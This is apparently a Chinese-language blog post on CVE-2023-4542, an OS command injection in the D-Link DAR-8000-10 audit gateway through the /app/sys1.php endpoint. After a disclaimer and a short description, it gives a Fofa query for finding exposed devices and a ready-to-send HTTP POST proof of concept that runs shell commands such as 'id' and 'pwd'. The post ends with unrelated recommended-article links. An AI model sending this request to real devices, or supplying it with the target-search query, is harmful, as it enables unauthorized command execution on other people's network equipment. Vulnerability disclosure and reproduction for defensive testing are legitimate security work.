D-Link DAR-8000操作系统命令注入漏洞(CVE-2023-4542)

免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。

任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。

该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。

作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

D-Link DAR-8000是中国友讯(D-Link)公司的上网行为审计网关。

D-Link DAR-8000-10版本存在操作系统命令注入漏洞。

漏洞影响

D-Link DAR-8000-10

漏洞危害

该漏洞源于文件/app/sys1.php的参数id会导致操作系统命令注入。

网络测绘

Fofa: body="DAR-8000-10"


漏洞复现

1. 构造poc

vbnet 复制代码
POST /app/sys1.php HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 6

cmd=id

2. 发送数据包,执行命令

id命令

pwd命令

相关推荐
车载诊断技术2 小时前
电子电气架构 --- 什么是EPS?
网络·人工智能·安全·架构·汽车·需求分析
m0_748247553 小时前
Web 应用项目开发全流程解析与实战经验分享
开发语言·前端·php
luck_0076 小时前
PhpSpreadsheet 导出excel 找不到setCellValueByColumnAndRow
php
生椰拿铁You6 小时前
解决Apache/2.4.39 (Win64) PHP/7.2.18 Server at localhost Port 80问题
php
brrdg_sefg6 小时前
WEB 漏洞 - 文件包含漏洞深度解析
前端·网络·安全
浏览器爱好者7 小时前
谷歌浏览器的网络安全检测工具介绍
chrome·安全
独行soc8 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍11基于XML的SQL注入(XML-Based SQL Injection)
数据库·安全·web安全·漏洞挖掘·sql注入·hw·xml注入
风间琉璃""9 小时前
bugkctf 渗透测试1超详细版
数据库·web安全·网络安全·渗透测试·内网·安全工具
儒道易行9 小时前
【DSVW】攻防实战全记录
web安全·网络安全